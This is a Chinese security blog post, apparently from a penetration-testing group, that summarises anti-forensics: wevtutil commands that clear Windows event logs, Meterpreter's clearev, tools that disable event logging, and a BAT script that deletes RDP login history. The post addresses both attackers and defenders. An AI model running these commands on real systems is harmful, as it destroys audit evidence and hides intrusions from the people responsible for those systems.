渗透中关于痕迹清理汇总

0x01 前言

在进行渗透测试中为避免入侵行为被发现,攻击者总是会通过各种方式来隐藏自己,比如:隐藏自己的真实IP、清除系统日志、删除上传的工具、隐藏后门文件、擦除入侵过程中所产生的痕迹等。对于一次完整的渗透测试,通常会选择对Windows日志进行清除和绕过,而对于防御者来说,了解常用的绕过方法也有助于更好的保护自己的系统。
下面就是纸飞机安全总结的一些、欢迎补充

0x02 windows日志清理

  • wevtutil.exe

获取日志信息:

wevtutil.exe gli Application

纸飞机sec

删除该日志所有信息:

wevtutil cl Application

wevtutil_1.png

  • 破坏Windows日志记录功能
    利用工具:

Invoke-Phant0m
Windwos-EventLog-Bypass

若是在MSF内可以使用如下语句进行:

run clearlogs
clearev

  • 自编写BAT脚本3389登陆记录清除
@echo off
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
@del "%USERPROFILE%\My Documents\Default.rdp" /a
@exit
本文经授权后发布,本文观点不代表立场
-- 展开阅读全文 --
纸飞机安全漏洞复现-VMware vCenter Server远程代码执行漏洞复现 CVE-2021-21972
« 上一篇 02-28
干货|2021"HW行动"思路分析
下一篇 » 03-03

发表评论